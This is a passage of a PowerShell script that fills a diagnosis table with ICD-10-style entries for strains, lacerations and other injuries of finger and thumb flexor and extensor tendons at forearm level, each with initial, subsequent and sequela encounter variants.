fascia and tendon of right middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right middle finger at forearm level","Laceration of flexor muscle, fascia and tendon of right middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right middle finger at forearm level","Laceration of flexor muscle, fascia and tendon of right middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left middle finger at forearm level","Laceration of flexor muscle, fascia and tendon of left middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left middle finger at forearm level","Laceration of flexor muscle, fascia and tendon of left middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left middle finger at forearm level","Laceration of flexor muscle, fascia and tendon of left middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right ring finger at forearm level","Laceration of flexor muscle, fascia and tendon of right ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right ring finger at forearm level","Laceration of flexor muscle, fascia and tendon of right ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right ring finger at forearm level","Laceration of flexor muscle, fascia and tendon of right ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left ring finger at forearm level","Laceration of flexor muscle, fascia and tendon of left ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left ring finger at forearm level","Laceration of flexor muscle, fascia and tendon of left ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left ring finger at forearm level","Laceration of flexor muscle, fascia and tendon of left ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right little finger at forearm level","Laceration of flexor muscle, fascia and tendon of right little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right little finger at forearm level","Laceration of flexor muscle, fascia and tendon of right little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of right little finger at forearm level","Laceration of flexor muscle, fascia and tendon of right little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left little finger at forearm level","Laceration of flexor muscle, fascia and tendon of left little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left little finger at forearm level","Laceration of flexor muscle, fascia and tendon of left little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of left little finger at forearm level","Laceration of flexor muscle, fascia and tendon of left little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of unspecified finger at forearm level","Laceration of flexor muscle, fascia and tendon of unspecified finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of unspecified finger at forearm level","Laceration of flexor muscle, fascia and tendon of unspecified finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of flexor muscle, fascia and tendon of unspecified finger at forearm level","Laceration of flexor muscle, fascia and tendon of unspecified finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right index finger at forearm level","Other injury of flexor muscle, fascia and tendon of right index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right index finger at forearm level","Other injury of flexor muscle, fascia and tendon of right index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right index finger at forearm level","Other injury of flexor muscle, fascia and tendon of right index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left index finger at forearm level","Other injury of flexor muscle, fascia and tendon of left index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left index finger at forearm level","Other injury of flexor muscle, fascia and tendon of left index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left index finger at forearm level","Other injury of flexor muscle, fascia and tendon of left index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right middle finger at forearm level","Other injury of flexor muscle, fascia and tendon of right middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right middle finger at forearm level","Other injury of flexor muscle, fascia and tendon of right middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right middle finger at forearm level","Other injury of flexor muscle, fascia and tendon of right middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left middle finger at forearm level","Other injury of flexor muscle, fascia and tendon of left middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left middle finger at forearm level","Other injury of flexor muscle, fascia and tendon of left middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left middle finger at forearm level","Other injury of flexor muscle, fascia and tendon of left middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right ring finger at forearm level","Other injury of flexor muscle, fascia and tendon of right ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right ring finger at forearm level","Other injury of flexor muscle, fascia and tendon of right ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right ring finger at forearm level","Other injury of flexor muscle, fascia and tendon of right ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left ring finger at forearm level","Other injury of flexor muscle, fascia and tendon of left ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left ring finger at forearm level","Other injury of flexor muscle, fascia and tendon of left ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left ring finger at forearm level","Other injury of flexor muscle, fascia and tendon of left ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right little finger at forearm level","Other injury of flexor muscle, fascia and tendon of right little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right little finger at forearm level","Other injury of flexor muscle, fascia and tendon of right little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of right little finger at forearm level","Other injury of flexor muscle, fascia and tendon of right little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left little finger at forearm level","Other injury of flexor muscle, fascia and tendon of left little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left little finger at forearm level","Other injury of flexor muscle, fascia and tendon of left little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of left little finger at forearm level","Other injury of flexor muscle, fascia and tendon of left little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of unspecified finger at forearm level","Other injury of flexor muscle, fascia and tendon of unspecified finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of unspecified finger at forearm level","Other injury of flexor muscle, fascia and tendon of unspecified finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of flexor muscle, fascia and tendon of unspecified finger at forearm level","Other injury of flexor muscle, fascia and tendon of unspecified finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other flexor muscle, fascia and tendon at forearm level, right arm","Unspecified injury of other flexor muscle, fascia and tendon at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other flexor muscle, fascia and tendon at forearm level, right arm","Unspecified injury of other flexor muscle, fascia and tendon at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other flexor muscle, fascia and tendon at forearm level, right arm","Unspecified injury of other flexor muscle, fascia and tendon at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other flexor muscle, fascia and tendon at forearm level, left arm","Unspecified injury of other flexor muscle, fascia and tendon at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other flexor muscle, fascia and tendon at forearm level, left arm","Unspecified injury of other flexor muscle, fascia and tendon at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other flexor muscle, fascia and tendon at forearm level, left arm","Unspecified injury of other flexor muscle, fascia and tendon at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Unspecified injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Unspecified injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Unspecified injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other flexor muscle, fascia and tendon at forearm level, right arm","Strain of other flexor muscle, fascia and tendon at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other flexor muscle, fascia and tendon at forearm level, right arm","Strain of other flexor muscle, fascia and tendon at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other flexor muscle, fascia and tendon at forearm level, right arm","Strain of other flexor muscle, fascia and tendon at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other flexor muscle, fascia and tendon at forearm level, left arm","Strain of other flexor muscle, fascia and tendon at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other flexor muscle, fascia and tendon at forearm level, left arm","Strain of other flexor muscle, fascia and tendon at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other flexor muscle, fascia and tendon at forearm level, left arm","Strain of other flexor muscle, fascia and tendon at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Strain of other flexor muscle, fascia and tendon at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Strain of other flexor muscle, fascia and tendon at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Strain of other flexor muscle, fascia and tendon at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other flexor muscle, fascia and tendon at forearm level, right arm","Laceration of other flexor muscle, fascia and tendon at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other flexor muscle, fascia and tendon at forearm level, right arm","Laceration of other flexor muscle, fascia and tendon at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other flexor muscle, fascia and tendon at forearm level, right arm","Laceration of other flexor muscle, fascia and tendon at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other flexor muscle, fascia and tendon at forearm level, left arm","Laceration of other flexor muscle, fascia and tendon at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other flexor muscle, fascia and tendon at forearm level, left arm","Laceration of other flexor muscle, fascia and tendon at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other flexor muscle, fascia and tendon at forearm level, left arm","Laceration of other flexor muscle, fascia and tendon at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Laceration of other flexor muscle, fascia and tendon at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Laceration of other flexor muscle, fascia and tendon at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Laceration of other flexor muscle, fascia and tendon at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other flexor muscle, fascia and tendon at forearm level, right arm","Other injury of other flexor muscle, fascia and tendon at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other flexor muscle, fascia and tendon at forearm level, right arm","Other injury of other flexor muscle, fascia and tendon at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other flexor muscle, fascia and tendon at forearm level, right arm","Other injury of other flexor muscle, fascia and tendon at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other flexor muscle, fascia and tendon at forearm level, left arm","Other injury of other flexor muscle, fascia and tendon at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other flexor muscle, fascia and tendon at forearm level, left arm","Other injury of other flexor muscle, fascia and tendon at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other flexor muscle, fascia and tendon at forearm level, left arm","Other injury of other flexor muscle, fascia and tendon at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Other injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Other injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm","Other injury of other flexor muscle, fascia and tendon at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Unspecified injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Unspecified injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Unspecified injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Unspecified injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Unspecified injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Unspecified injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Unspecified injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Unspecified injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Unspecified injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Strain of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Strain of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Strain of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Strain of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Strain of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Strain of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Strain of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Strain of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Strain of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Laceration of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Laceration of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Laceration of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Laceration of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Laceration of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Laceration of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Laceration of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Laceration of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Laceration of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Other injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Other injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level","Other injury of extensor or abductor muscles, fascia and tendons of right thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Other injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Other injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level","Other injury of extensor or abductor muscles, fascia and tendons of left thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Other injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Other injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level","Other injury of extensor or abductor muscles, fascia and tendons of unspecified thumb at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right index finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right index finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right index finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left index finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left index finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left index finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right middle finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right middle finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right middle finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left middle finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left middle finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left middle finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right ring finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right ring finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right ring finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left ring finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left ring finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left ring finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right little finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right little finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of right little finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of right little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left little finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left little finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of left little finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of left little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at forearm level","Unspecified injury of extensor muscle, fascia and tendon of unspecified finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right index finger at forearm level","Strain of extensor muscle, fascia and tendon of right index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right index finger at forearm level","Strain of extensor muscle, fascia and tendon of right index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right index finger at forearm level","Strain of extensor muscle, fascia and tendon of right index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left index finger at forearm level","Strain of extensor muscle, fascia and tendon of left index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left index finger at forearm level","Strain of extensor muscle, fascia and tendon of left index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left index finger at forearm level","Strain of extensor muscle, fascia and tendon of left index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right middle finger at forearm level","Strain of extensor muscle, fascia and tendon of right middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right middle finger at forearm level","Strain of extensor muscle, fascia and tendon of right middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right middle finger at forearm level","Strain of extensor muscle, fascia and tendon of right middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left middle finger at forearm level","Strain of extensor muscle, fascia and tendon of left middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left middle finger at forearm level","Strain of extensor muscle, fascia and tendon of left middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left middle finger at forearm level","Strain of extensor muscle, fascia and tendon of left middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right ring finger at forearm level","Strain of extensor muscle, fascia and tendon of right ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right ring finger at forearm level","Strain of extensor muscle, fascia and tendon of right ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right ring finger at forearm level","Strain of extensor muscle, fascia and tendon of right ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left ring finger at forearm level","Strain of extensor muscle, fascia and tendon of left ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left ring finger at forearm level","Strain of extensor muscle, fascia and tendon of left ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left ring finger at forearm level","Strain of extensor muscle, fascia and tendon of left ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right little finger at forearm level","Strain of extensor muscle, fascia and tendon of right little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of 